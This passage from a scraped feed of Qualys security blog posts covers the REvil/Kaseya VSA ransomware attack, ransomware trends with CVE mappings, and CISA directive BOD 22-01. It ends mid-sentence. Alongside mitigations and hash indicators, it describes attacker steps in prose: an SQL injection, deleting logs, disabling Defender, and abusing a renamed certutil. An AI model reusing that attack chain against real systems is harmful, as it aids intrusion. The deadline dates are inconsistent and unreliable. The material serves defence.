13: Ransom note\n\n### Dashboard\n\nTo track your exposure, download and run the [Kaseya (REvil RansomWare) dashboard](<https://qualys-secure.force.com/customer/s/article/000006720>).\n\n\n\n### Artifact\n\n * The group launches 0day authorization [bypass/SQL injection](<https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident>) attack via the userFilterTableRpt.asp file.\n * In the first stage, they delete logs in multiple locations (IIS logs as well as logs stored in the application database).\n * The group delivers a PowerShell payload that disables Windows Defender.\n * The group copied and renamed certutil.exe to cert.exe before running the commands.\n * The group uses certutil.exe to decode and execute the previously uploaded agent.crt to agent.exe files.\n * The group uploaded a .js file masqueraded as a .jpg file - screenshot.jpg.\n * The group has used services like Shodan to collect a list of targets before attacking.\n * The group encrypts files on victim systems and demands a ransom to decrypt the files.\n\n### REvil TTP Map\n\nReconnaissance| Initial Access| Execution| Defense Evasion| Command and Control| Impact \n---|---|---|---|---|--- \nSearch Open Technical Databases: Scan Databases (T1596.005)| Exploit Public-Facing Application (T1190)| Command and Scripting Interpreter: PowerShell (T1059.001)| Indicator Removal on Host: File Deletion (T1070.004)| Ingress Tool Transfer (T1105)| Data Manipulation: Stored Data Manipulation (T1565.001) \n| | | Deobfuscate/Decode Files or Information (T1140)| | Data Encrypted for impact (T1486) \n| | | Masquerading (T1036)| | Defacement: Internal Defacement (T1491.001) \n| | | Masquerading: Rename System Utilities (T1036.003)| | \n| | | Hijack Execution Flow: DLL Side-Loading (T1574.002)| | \n| | | Subvert Trust Controls: Code Signing (T1553.002)| | \n| | | Impair Defenses: Disable or Modify System Firewall (T1562.004)| | \n| | | Virtualization/Sandbox Evasion: Time Based Evasion 
(T1497.003)| | \n| | | Modify Registry (T1112)| | \n| | | Impair Defenses: Disable or Modify Tools (T1562.001)| | \n \n### **Mitigation or **Additional Important Safety Measures\n\n#### Network\n\n * Keep strong and unique passwords for login accounts.\n * Disable RDP if not used. If required change the RDP port to a non-standard port.\n * Configure firewall in the following way:\n * Deny access to Public IPs to important ports (in this case RDP port 3389),\n * Allow access to only IPs which are under your control.\n * Use VPN to access the network, instead of exposing RDP to the Internet. Possibility to implement Two Factor Authentication (2FA).\n * Set lockout policy which hinders credentials guessing.\n * Create a separate network folder for each user when managing access to shared network folders.\n\n#### **Take regular data backup**\n\n * Protect systems from ransomware by periodically backing up important files regularly and keep a recent backup copy offline. Encrypt your backup.\n * If your computer gets infected with ransomware, your files can be restored from the offline backup once the malware has been removed.\n * Always use a combination of online and offline backup.\n * Do not keep offline backups connected to your system as this data could be encrypted when ransomware strike.\n\n#### **Keep software updated**\n\n * Always keep your security software (antivirus, firewall, etc.) up to date to protect your computer from new variants of malware.\n * Regularly patch and update applications, software, and operating systems to address any exploitable software vulnerabilities.\n * Do not download cracked/pirated software as they risk backdoor entry for malware into your computer.\n * Avoid downloading software from untrusted P2P or torrent sites. In most cases, they are malicious software.\n\n#### **Having minimum required privileges**\n\n * Do not assign Administrator privileges to users. 
Most importantly, do not stay logged in as an administrator unless it is strictly necessary. Also, avoid browsing, opening documents, or other regular work activities while logged in as an administrator. \n\n### Indicators of Compromise (IOCs)\n\nSHA256\n\nd55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e \n8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd \ne2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2\n\n### References\n\n * <https://us-cert.cisa.gov/ncas/current-activity/2021/07/02/kaseya-vsa-supply-chain-ransomware-attack>\n * <https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_progress/>\n * <https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/>\n * <https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident>\n * <https://www.tenable.com/blog/cve-2021-30116-multiple-zero-day-vulnerabilities-in-kaseya-vsa-exploited-to-distribute-ransomware>\n * <https://www.secureworks.com/research/threat-profiles/gold-southfield>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-07T23:41:59", "type": "qualysblog", "title": "Analyzing the REvil Ransomware Attack", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30116"], "modified": "2021-07-07T23:41:59", "id": "QUALYSBLOG:894189F1B83B90193612FF586BF7576F", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-05T16:35:26", "description": "With most employees still working from remote locations, ransomware attacks have increased steadily since the early months of the Covid-19 pandemic. According to the FBI\u2019s 2020 Internet Crime Report, 2400+ ransomware-related incidents in 2020 resulted in a loss of about 29 million dollars. These numbers are only getting worse and do not include damage from incidents not reported to the FBI.\n\nRansomware attacks affect various industries worldwide, and ransomware demands continue to increase. Some recent examples include:\n\n * [Conti Ransomware:](<https://us-cert.cisa.gov/ncas/alerts/aa21-265a>) Conti ransomware is spread using spear phishing campaigns through tailored emails that contain malicious attachments or malicious links, and via stolen or weak Remote Desktop Protocol (RDP) credentials. 
\n * [Nefilim Ransomware](<https://blog.qualys.com/vulnerabilities-threat-research/2021/05/12/nefilim-ransomware>): Nefilim ransomware is distributed through exposed Remote Desktop Protocol (RDP) setups by brute-forcing them and using other known vulnerabilities for initial access, such as Citrix gateway devices.\n * [REvil Ransomware:](<https://blog.qualys.com/product-tech/2021/07/08/kaseya-revil-ransomware-attack-cve-2021-30116-automatically-discover-and-prioritize-using-qualys-vmdr>) REvil is a ransomware family that operates as ransomware-as-a-service (RaaS), has been linked to GOLD SOUTHFIELD, a financially motivated group, and was first identified in April 2019 according to MITRE.\n * [DarkSide Ransomware](<https://blog.qualys.com/vulnerabilities-threat-research/2021/06/09/darkside-ransomware>): DarkSide ransomware performs brute force attacks and exploits known vulnerabilities in the Remote Desktop Protocol (RDP) to gain initial access. DarkSide ransomware, first seen in August 2020 and updated as v2.0 in March 2021, is associated with the DarkSide group and now often operates as RaaS.\n * [Michigan State University (May 2020)](<https://www.zdnet.com/article/michigan-state-university-hit-by-ransomware-gang/>) - The MSU administrators were given a week to pay an undisclosed ransom demand to decrypt their files. If MSU officials refused to pay or chose to restore from backups, the cybercriminals were prepared to leak documents stolen from the university's network on a website the group operates on the dark web.\n * [DearCry and Exchange vulnerabilities](<https://news.sophos.com/en-us/2021/03/15/dearcry-ransomware-attacks-exploit-exchange-server-vulnerabilities/>) - DearCry ransomware attacks exploited Microsoft Exchange Server vulnerabilities CVE-2021-26855 and CVE-2021-27065. These vulnerabilities were being widely exploited before patches were available, forcing Microsoft to release out-of-band updates. 
\n * [Colonial Pipeline](<https://www.cnbc.com/2021/06/08/colonial-pipeline-ceo-testifies-on-first-hours-of-ransomware-attack.html>) - Colonial Pipeline was most likely the target of a ransomware attack due to a vulnerable, outdated version of Microsoft Exchange. Attackers potentially exploited these vulnerabilities, and as a result, Colonial Pipeline took its systems down to contain the threat, limiting gasoline supply to the East Coast. \n\nAs seen above, industries ranging from education, manufacturing, electronics, research, health and more are impacted by ransomware.\n\nTo help organizations combat risks from ransomware, Qualys is introducing the Ransomware Risk Assessment service. As outlined in [_our blog_](<https://blog.qualys.com/product-tech/2021/10/05/assess-risk-ransomware-attacks-qualys-research>), the Qualys Ransomware Risk Assessment & Remediation service leverages security intelligence curated by Qualys Research experts to map ransomware families to specific vulnerabilities, misconfigurations, and vulnerable software. The Qualys Ransomware Risk Assessment service enables organizations to:\n\n * Get a unified view into critical ransomware exposures such as internet-facing vulnerabilities and misconfigurations and insecure remote desktop gateways (RDP), as well as detection of risky software in datacenter environments, along with alerting for assets missing anti-malware solutions. \n * Accelerate remediation of ransomware exposures with zero-touch patching by continuously patching ransomware-related vulnerabilities as they are detected. The remediation plan also enables proactive patching for prioritized software to help you keep software up to date. \n\n#### **Ransomware Infection Vectors**\n\nAlthough cyber criminals use a variety of techniques to infect victims with ransomware, the most common means of infection are: \n\n * **Remote Desktop Protocol** (RDP) vulnerabilities: RDP allows individuals to see and control a system remotely. 
It is a very common practice in organizations, as it provides easy remote access to systems. Once cybercriminals have RDP access, they can deploy malicious software on the system, making it inaccessible to legitimate users unless the victim pays the demanded ransom. A Shodan search shows currently open and potentially vulnerable RDP services on the internet, and RDP access can be bought for [as low as US$3](<https://www.bankinfosecurity.com/how-much-that-rdp-credential-in-window-a-10590>). \n\n\n\n * **Email phishing campaigns**: Email is a prevalent medium for getting malware into the target environment. Cybercriminals use emails to send malicious links that deploy malware on recipients\u2019 machines. This allows them to steal sensitive data without breaking through network security and is very common among cybercriminals. \n * **Software vulnerabilities**: Software vulnerabilities are even more prevalent than phishing. Client- and server-side vulnerabilities allow criminals to take advantage of security weaknesses in widely used software programs, gain control of victim systems, and deploy ransomware. Vulnerabilities in VPN systems such as Pulse Secure VPN and Fortinet are common targets as well.\n\n#### **Ransomware Attacks and Exact CVEs To Prioritize for Monitoring**\n\nAs mentioned above, known vulnerabilities and weaknesses are among the top infection vectors. \n\nThe Qualys research team has performed extensive research on 36 prevalent ransomware families and has mapped them to 64 CVEs and the 247 QIDs that can detect them. The following is just a sample list of some of the most widely used ransomware in attacks, along with the CVEs leveraged to infect systems. \n\n**Ransomware**| **Description**| **CVE(s)**| **QID(s)** \n---|---|---|--- \nConti | The Conti ransomware strain will not only encrypt important files but will also exfiltrate them to a location controlled by the attacker. 
This method of extortion-ware is used to force victims to pay the ransom in order to avoid the sensitive data being leaked. Conti operators are known to use well-known hacking tools such as Mimikatz and Cobalt Strike leading up to the encryption of files. | CVE-2020-1472, CVE-2021-34527, CVE-2017-0143, CVE-2017-0144, CVE-2017-0145 | 91680, 91668, 91785, 91345, 91360 \nTeslaCrypt, PrincessLocker | TeslaCrypt ransomware was uploaded to VirusTotal in November 2014 but was more widely spread in early 2015 and continues to evolve. TeslaCrypt encrypts files using the AES-256 algorithm until the victim pays the ransom in either Bitcoin or Cash Cards. | CVE-2013-2551, CVE-2015-8651 | 168351, 168350, 124422, 168341, 168340, 100271, 124421 \nLocky, Cerber | Cerber ransomware is ransomware-as-a-service (RaaS), meaning an attacker can distribute the licensed copy of this ransomware over the internet and pay commissions to the developer. | CVE-2016-1019 | 256924, 256922, 177873, 176784, 296029, 296028, 170815, 170724, 170711, 170365, 256256, 170264, 236438, 170119, 256214, 170052, 276628, 236342, 157445, 169942, 169941, 169923, 276572, 169854, 169853, 176004, 196742, 196725, 370320, 276455, 175965, 168848, 168813, 168792, 168696, 168694, 168594, 100282, 124879, 124872 \nWannaCry, Badrabbit | The WannaCry ransomware \u2014 formally known as WanaCrypt0r 2.0 \u2014 spreads using an exploit called EternalBlue for a Windows OS vulnerability that Microsoft patched in March 2017. | CVE-2017-0145 | 91361, 91360, 91359, 91347, 91345 \nDearCry, BlackKingdom | DearCry takes advantage of compromised Microsoft Exchange Servers with vulnerability CVE-2021-26855. When exploited, cybercriminals gain initial access to the Exchange Server and then install web shells. 
| CVE-2021-26855 | 50107, 50108 \n \n### Unified View of Critical Ransomware Risk Exposures\n\nIt is a daunting task to get a unified view of multiple critical ransomware exposures together, such as internet-facing vulnerabilities, misconfigurations, and unauthorized software. The Qualys Ransomware Risk Assessment & Remediation service dashboard enables security teams to see all internet-facing assets that are exposed to a ransomware-related vulnerability or misconfiguration and take the needed actions in the most impactful way. It also enables users to measure and track their effectiveness at addressing vulnerabilities or misconfigurations before they are used in ransomware attacks. \n\n\n\nIn addition, organizations should implement a good cyber hygiene program to scan for vulnerabilities and discover misconfigurations regularly, with sufficient detection capabilities (such as QIDs) enabled, as well as an efficient automated process to deploy important security patches to targeted assets quickly and at the needed scale. \n\n### Qualys Ransomware Risk Assessment & Remediation Service\n\nQualys provides an all-in-one solution to discover, assess, prioritize, monitor, and patch critical vulnerabilities in real time across your global hybrid-IT landscape. The following sections provide an overview of each of the critical components from the Qualys product portfolio and how they can be uniquely valuable in the effort of combatting ransomware attacks. \n\n#### Detect your critical data assets & monitor security blind spots with CyberSecurity Asset Management (CSAM) \n\nCSAM enables organizations to automatically discover every asset in their environment, including unmanaged assets appearing on the network, inventory all hardware and software, and classify and tag critical assets. \n\n#### Discover, Inventory and Categorize assets \n\nIt is important to know your blind spots to protect against ransomware. 
Use CSAM to discover all assets, including the ones that are exposed to the internet as well as unknown/unmanaged assets that are connecting to your network. \n\nCSAM automatically organizes your assets by their functional category by analyzing their hardware and installed software. It extends your inventory by incorporating key business information from your CMDB, such as status, environment, ownership, support groups, and business criticality.\n\n\n\n#### Monitor & detect at-risk assets and applications - Assets missing Anti-virus, running unauthorized software \n\nCSAM enriches your asset inventory with in-context, relevant information to help you detect at-risk assets and applications. You can identify and set alerts for assets that are running unauthorized software or are not using anti-virus/endpoint security tools. \n\n * Unauthorized software should be removed to quickly reduce unnecessary attack vectors. With CSAM you can easily define rules to monitor unauthorized software installations. 
\n * Identify assets missing required security software, such as Antivirus and Endpoint Protection. \n * Identify EOL/EOS software, which can be used as ransomware attack vectors. End-of-Support software is one of the first things hackers look to exploit because they know publishers are no longer providing security updates and patches. \n\n\n\n### Continuous detection & prioritization for Ransomware-specific vulnerabilities with VMDR \n\nThe first step in managing vulnerabilities and reducing risk is identification of assets. [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) makes it easy to identify systems with open ports, for example hosts with Remote Desktop Protocol (RDP) enabled: \n\n_operatingSystem.category1:`Windows` and openPorts.port:`3389`_ \n\n\n\nOnce the hosts with RDP are identified, they can be grouped together with a \u2018dynamic tag\u2019, let us say \u201cRDP Asset\u201d. This helps in automatically grouping existing hosts with this exposure as well as any new hosts that spin up in your environment. Tagging makes these grouped assets available for querying, reporting and management throughout the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>). \n\n### **Discover and Prioritize Ransomware Vulnerabilities** \n\nNow that hosts with \u201cRDP\u201d are identified, you want to detect which of these assets are flagged for ransomware-related vulnerabilities. VMDR automatically detects new vulnerabilities like Windows RDP, Exchange Server vulnerabilities and more based on the always-updated Knowledgebase. \n\nYou can see all your impacted hosts for these vulnerabilities, tagged with the \u2018Ransomware\u2019 asset tag, in the vulnerabilities view by using this QQL query: \n\n**vulnerabilities.vulnerability.threatIntel.ransomware: true** \n\nOr \n\n**vulnerabilities.vulnerability.ransomware.name:WannaCry** \n\nThis will return a list of all impacted hosts. 
\n\n\n\nUsing VMDR prioritization, the ransomware vulnerabilities can be easily prioritized using \u201cRansomware\u201d Real-Time Threat Intelligence: \n\n\n\nVMDR also enables you to stay on top of these threats proactively via the \u2018live threat feed\u2019 provided for threat prioritization. With the \u2018live feed\u2019 updated for all emerging high and medium risks, you can clearly see the impacted hosts against threats. \n\nSimply click on the impacted assets for the \u201cRansomware\u201d feeds to see the vulnerability and impacted host details.\n\n\n\nQualys provides a Unified Dashboard with key metrics across all apps, showing your overall security posture against ransomware-related data points such as: \n\n * Ransomware-related vulnerabilities \n * Unauthorized software \n * Misconfigurations leveraged by ransomware \n * Internet-facing hosts with RDP vulnerabilities, and many more\u2026 \n\nThe Unified Dashboard enables you to track your ransomware exposure, the impacted hosts, their status, and overall management in real time. \n\n### **Discover and Mitigate Ransomware Misconfigurations such as SMB, Insecure RDP** \n \n\n[Qualys Policy Compliance](<https://www.qualys.com/apps/policy-compliance/>) provides the Ransomware Best Practices policy, which contains the critical controls mapped to MITRE ATT&CK mitigations and tactics recommended by [CISA](<https://us-cert.cisa.gov/ncas/alerts/aa21-131a>) and best practices published by [FireEye Mandiant](<https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/wp-ransomware-protection-and-containment-strategies.pdf>). These mitigations are effective across top techniques and can potentially reduce the risk of ransomware attacks. These critical controls can limit attacker initial access and lateral movement around the network. 
\n\nAs organizations look to prevent attacks from happening in the first place, security teams should focus on implementing these controls proactively and effectively across all assets to reduce the risk. By automating configuration assessment with Qualys Policy Compliance, organizations can ensure golden images conform to security baselines, prevent images from ever having misconfigurations, and identify configuration drift to prevent security risks. \n\n#### **Mitigation or Important Precautionary Measures and Controls** \n\nThe Qualys internal research team has identified the top five security measures and configuration controls that a security team should consider for their organization to prevent business interruption from a ransomware attack. The research is based on best practices published by FireEye (Mandiant), the Cybersecurity and Infrastructure Security Agency (CISA), and CISA MS-ISAC. Policies/technical controls should be implemented. These configuration checks go beyond typical CIS or DISA benchmarks. \n \n\n 1. Enforce password policies, e.g.: \n * A minimum password age should be set. \n * Password complexity requirements should be enabled. \n * Enforce password history restrictions. \n 2. Employ best practices for use of Remote Desktop Protocol, e.g.: \n * Disable RDP services if not necessary. \n * Close unused RDP ports and audit the network for systems using RDP. \n * Apply multifactor authentication. \n * Disable or block Server Message Block (SMB) protocol and remove or disable outdated versions of SMB. \n * Apply RDP account controls. \n 3. Employ network security and firewalls, e.g.: \n * Enforce firewall policy rules. \n * Apply a deny-all rule and allow only required networks and access. \n * Block common ports and protocols that do not need to be exposed. \n 4. Enforce account use policies, e.g.: \n * Apply account lockouts after a specified number of attempts. \n * Admin approval requirements. \n * Apply UAC restrictions on network logons, etc. 
\n * Assign least privileges to users. \n 5. Keep software updated: \n * Ensure automatic updates are enabled. \n * Patches and software updates should be installed in a timely manner, including for operating systems, applications, etc. \n\n\n\nQualys research has mapped misconfigurations to the relevant MITRE ATT&CK techniques (summarized in the table below) to define 237 configuration checks across five security areas: RDP hardening, user controls, network/protocol/port configuration security, share and password policies, and software update policies, essentially helping organizations proactively prevent 20 attack techniques leveraged in ransomware attacks. \n \n\n**TTP Map** \n\nInitial Access (TA0001)| Credential Access (TA0006)| Privilege Escalation (TA0004)| Execution (TA0002)| Defense Evasion (TA0005)| Lateral Movement (TA0008)| Command and Control (TA0011)| Impact (TA0040) \n---|---|---|---|---|---|---|--- \nValid Accounts (T1078)| Brute Force (T1110)| Abuse Elevation Control Mechanism (T1548)| Scheduled Task / Job (T1053)| Impair Defenses (T1562)| Remote Services (T1021)| Non-Application Layer Protocol (T1095)| Data Manipulation: Transmitted Data Manipulation (T1565.002) \nSupply Chain Compromise (T1195)| | Abuse Elevation Control Mechanism: Bypass User Account Control (T1548.002)| Inter-Process Communication (T1559)| Trusted Developer Utilities Proxy Execution (T1127)| Exploitation of Remote Services (T1210)| | \nSupply Chain Compromise: Compromise Software Dependencies and Development Tools (T1195.001)| | Access Token Manipulation (T1134)| | | Remote Services (T1021)| | \n | Unsecured Credentials (T1552)| | | | Remote Services: Remote Desktop Protocol (T1021.001)| | \n | | | | | Remote Services: Remote Desktop Protocol (T1021.002)| | \n | | | | | Remote Service Session Hijacking (T1563)| | \n \n### **Automated Proactive & Reactive Patching for Ransomware vulnerabilities** \n\nTo keep the ransomware vulnerability patches always up 
to date on your assets, we strongly encourage users to take advantage of Qualys Zero-Touch Patch, which allows users to automatically patch new ransomware-related vulnerabilities that are actively used in attacks. Qualys Zero-Touch Patch enables businesses to patch and address at least 97% of ransomware-related vulnerabilities, faster and at scale. For more information on Qualys automatic patch capabilities, refer to the blog [Automate Vulnerability Remediation with Proactive Zero-Touch Patch](<https://blog.qualys.com/product-tech/2021/09/14/optimize-vulnerability-remediation-with-zero-touch-patch>). \n\nFollowing patch management best practices using Qualys Patch Management allows organizations to proactively remediate vulnerabilities related to ransomware and therefore minimize ransomware attacks in their environment. A simple and efficient way to use Qualys Patch Management to remediate ransomware-related vulnerabilities is to leverage the VMDR prioritization report described in a previous section; this report can be used to detect assets with ransomware-related vulnerabilities. The tight integration between Qualys VMDR and Patch Management allows customers to add those ransomware-related vulnerabilities directly from the prioritization report into a patch job. The Qualys engine will automatically map the selected vulnerabilities to the relevant patches in the customer\u2019s environment that are required to remediate them. This allows IT teams to focus on deploying those patch jobs without the need to research vulnerabilities and manually find the relevant patches.\n\n\n\n### **Ready to Learn more and see for yourself?** \n\n[Join the webinar](<https://event.on24.com/wcc/r/3433269/88DA8B72F4DE260B0DE22B7E5632ACBB>), Combating Risk from Ransomware Attacks, to discuss the current state of ransomware and prevention techniques. The webinar takes place October 21, 2021, at 10am Pacific. Sign up now! 
\n\n**Resources** \n \n\n * [Press Release](<https://www.qualys.com/company/newsroom/news-releases/usa/qualys-launches-ransomware-risk-assessment-service/>) \n * [Ransomware Assessment Service Video](<https://vimeo.com/617379785/>) \n * [Research Powered Qualys Ransomware Risk Assessment & Remediation service](<https://blog.qualys.com/product-tech/2021/10/05/assess-risk-ransomware-attacks-qualys-research>) \n * [Try Qualys Ransomware Risk Assessment Service](<https://www.qualys.com/forms/ransomware/>) \n * Learn more about the research and see the Qualys Ransomware Risk Assessment & Remediation service in action by attending the [webinar](<https://event.on24.com/wcc/r/3433269/88DA8B72F4DE260B0DE22B7E5632ACBB>) \n\n### References\n\n * <https://www.ic3.gov/Content/PDF/Ransomware_Fact_Sheet.pdf>\n * <https://www.ic3.gov/Media/Y2019/PSA191002>\n * <https://www.ic3.gov/Media/PDF/AnnualReport/2020_IC3Report.pdf>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-10-05T12:50:00", "type": "qualysblog", "title": "The Rise of Ransomware", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2551", 
"CVE-2015-8651", "CVE-2016-1019", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2020-1472", "CVE-2021-26855", "CVE-2021-27065", "CVE-2021-30116", "CVE-2021-34527"], "modified": "2021-10-05T12:50:00", "id": "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-09T06:36:02", "description": "[Start your VMDR 30-day, no-cost trial today](<https://www.qualys.com/forms/vmdr/>)\n\n## Overview\n\nOn November 3, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>), "Reducing the Significant Risk of Known Exploited Vulnerabilities." [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of known exploited vulnerabilities that carry significant risk to the federal government and establishes requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires agencies to review and update their internal vulnerability management procedures within 60 days and to remediate each vulnerability according to the timelines outlined in CISA's vulnerability catalog.\n\nQualys helps customers to identify and assess risk to organizations' digital infrastructure and automate remediation. 
Qualys' guidance for rapid response to the Operational Directive is below.\n\n## Directive Scope\n\nThis directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency's behalf.\n\nHowever, CISA strongly recommends that private businesses and state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA's public catalog.\n\n## CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [291 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. The Qualys Research team has mapped all these CVEs to applicable QIDs. You can view the complete list of CVEs and the corresponding QIDs [here](<https://success.qualys.com/discussions/s/article/000006791>).\n\n### Not all vulnerabilities are created equal\n\nOur quick review of the 291 CVEs posted by CISA suggests that not all vulnerabilities hold the same priority. CISA has ordered U.S. federal enterprises to apply patches as soon as possible. The remediation guidance can be grouped into three distinct categories:\n\n#### Category 1 \u2013 Past Due\n\nRemediation of 15 CVEs (~5%) is already past due. These vulnerabilities include some of the most significant exploits in the recent past, including PrintNightmare, SigRed, ZeroLogon, and vulnerabilities in CryptoAPI, Pulse Secure, and more. 
Qualys Patch Management can help you remediate most of these vulnerabilities.\n\n#### Category 2 \u2013 Patch in less than two weeks\n\n100 vulnerabilities (34%) need to be patched in the next two weeks, or by **November 17, 2022**.\n\n#### Category 3 \u2013 Patch within six months\n\nThe remaining 176 vulnerabilities (60%) must be patched within the next six months, or by **May 3, 2022**.\n\n## Detect CISA's Vulnerabilities Using Qualys VMDR\n\nThe Qualys Research team has released several remote and authenticated detections (QIDs) for the vulnerabilities. Since the directive includes 291 CVEs, we recommend executing your search based on vulnerability criticality, release date, or other categories.\n\nFor example, to detect critical CVEs released in 2021:\n\n_vulnerabilities.vulnerability.criticality:CRITICAL and vulnerabilities.vulnerability.cveIds:[ `CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-202
1-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]_\n\n\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using the VMDR Prioritization report.\n\n\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n\n\nWith Qualys Unified Dashboard, you can track your exposure to the CISA Known Exploited Vulnerabilities and gather your status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of the status of the vulnerabilities in your environment using the ["CISA 2010-21| KNOWN EXPLOITED VULNERABILITIES"](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard:\n\n\n\n### Summary Dashboard High Level Structured by Vendor:\n\n\n\n## Remediation\n\nTo comply with this directive, federal agencies must remediate most "Category 2" vulnerabilities by **November 17, 2021**, and "Category 3" by May 3, 2021. Qualys Patch Management can help streamline the remediation of many of these vulnerabilities.\n\nCustomers can copy the following query into the Patch Management app to comply with the directive's aggressive remediation date of November 17, 2021. 
